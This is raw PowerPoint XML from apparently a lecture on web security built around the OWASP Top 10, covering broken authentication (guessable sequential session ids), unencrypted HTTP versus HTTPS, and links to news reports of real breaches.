    <p:sldLayoutId id="2147483679" r:id="rId24"/>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QL_injection#Example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forbes.com/sites/thomasbrewster/2018/09/29/how-facebook-was-hacked-and-why-its-a-disaster-for-internet-security/#521220f8203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ws.amazon.com/certificate-manager/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://letsencrypt.or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checkmarx.com/2018/01/23/tinder-someone-may-watching-swipe-2/"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boris.in/blog/2016/the-bank-jo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owasp.org/images/7/72/OWASP_Top_10-2017_(en).pdf.pdf"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motherboard.vice.com/en_us/article/9kmj4v/spyware-company-spyfone-terabytes-data-exposed-online-leak"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zdnet.com/article/tweetdeck-wasnt-actually-hacked-and-everyone-was-silly/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://motherboard.vice.com/en_us/article/wnjwb4/the-myspace-worm-that-changed-the-internet-forever"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ju.se/"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expressjs/csur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xkcd.com/327/"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52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#1 Injection Real examples</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480131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/SQL_injection#Examples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22775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#2 Broken Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1825625"/>
            <a:ext cx="10727725" cy="2031325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424240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#2 Broken Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1825625"/>
            <a:ext cx="10727725" cy="1900007"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sessions ids are generated as 1, 2, 3, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anyone can guess the session id "2" and then take over that user's session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session ids needs to be random and hard to guess.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397764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4000" dirty="0"/>
              <a:t>#2 Broken Authentication examples </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" noProof="0" dirty="0"/>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1550168"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How Facebook Was Hacked And Why It's A Disaster For Internet Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.forbes.com/sites/thomasbrewster/2018/09/29/how-facebook-was-hacked-and-why-its-a-disaster-for-internet-security/#521220f82033</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="179528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#3 Sensitive Data Exposure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1825625"/>
            <a:ext cx="10727725" cy="2806922"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>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endParaRPr lang="en-US" i="1" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24268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#3 Sensitive Data Exposure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1825625"/>
            <a:ext cx="10727725" cy="2185727"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>HTTP is not encrypted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Anyone between you and the server can read your requests/responses!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Not good for passwords, bank transactions, session ids etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>HTTPS to the rescue!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>HTTP sent encrypted.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4822801" y="3574722"/>
            <a:ext cx="3126260" cy="2360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199682" y="3352300"/>
            <a:ext cx="2372497" cy="630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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CAFE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6134677" y="4754792"/>
            <a:ext cx="605481" cy="10194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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6564073" y="5207358"/>
            <a:ext cx="114301" cy="1143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6" name="Group 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2958990" y="4624788"/>
            <a:ext cx="514606" cy="944520"/>
            <a:chOff x="2669059" y="4658238"/>
            <a:chExt cx="514606" cy="944520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Oval 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2793655" y="4658238"/>
              <a:ext cx="260007" cy="26000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 name="Straight Connector 13"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2923658" y="4845392"/>
              <a:ext cx="0" cy="452566"/>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a:off x="2793655" y="5297958"/>
              <a:ext cx="130003" cy="3048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2923658" y="5291264"/>
              <a:ext cx="130004" cy="311494"/>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2669059" y="4951582"/>
              <a:ext cx="254599" cy="120093"/>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2923658" y="4918245"/>
              <a:ext cx="260007" cy="153430"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="dk1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="dk1"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="dk1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rounded Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5113185" y="4286689"/>
            <a:ext cx="786714" cy="3116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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WiFi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Cloud 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9027962" y="2835512"/>
            <a:ext cx="2246870" cy="1539379"/>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Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rounded Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3595619" y="4751895"/>
            <a:ext cx="148281" cy="22628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1" name="Straight Connector 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3722619" y="4439489"/>
            <a:ext cx="1477063" cy="425548"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent5"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent5"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent5"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Straight Connector 32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5810355" y="3414085"/>
            <a:ext cx="3617914" cy="1033018"/>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1653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Encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904095"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1340701"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
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777307"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2213913"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2650519"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F</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3087125"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G</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3523731"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3960337"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I</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4396943"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J</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4833549"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K</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5270155"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706761"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t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6143367"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6579973"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7016579"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7453185"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Q</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7889791"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R</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8326397"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763003"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9199609"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U</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9636215"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V</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10072821"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W</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10509427"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X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10946033" y="169068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Y</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11382640" y="1690686"/>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Z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467489" y="1690687"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11382638" y="3454916"/>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B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467489"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t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904095"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D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1340701"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E</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777307"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F</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Rectangle 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2213913"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G</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rectangle 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2650519"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H</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Rectangle 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3087125"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I</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Rectangle 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3523731"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J</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Rectangle 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3960337"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K</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Rectangle 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4396943"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L</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Rectangle 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4833549"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M</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rectangle 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5270155"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N</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Rectangle 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706761"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Rectangle 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6143367"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P</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Rectangle 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6579973"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Q</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Rectangle 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7016579"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R</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Rectangle 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7453185"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S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Rectangle 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7889791"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T</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Rectangle 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8326397"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U</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Rectangle 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763003"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V</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Rectangle 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9199609"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W</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Rectangle 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9636215"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X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Rectangle 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10072821" y="3454918"/>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Y</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Rectangle 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
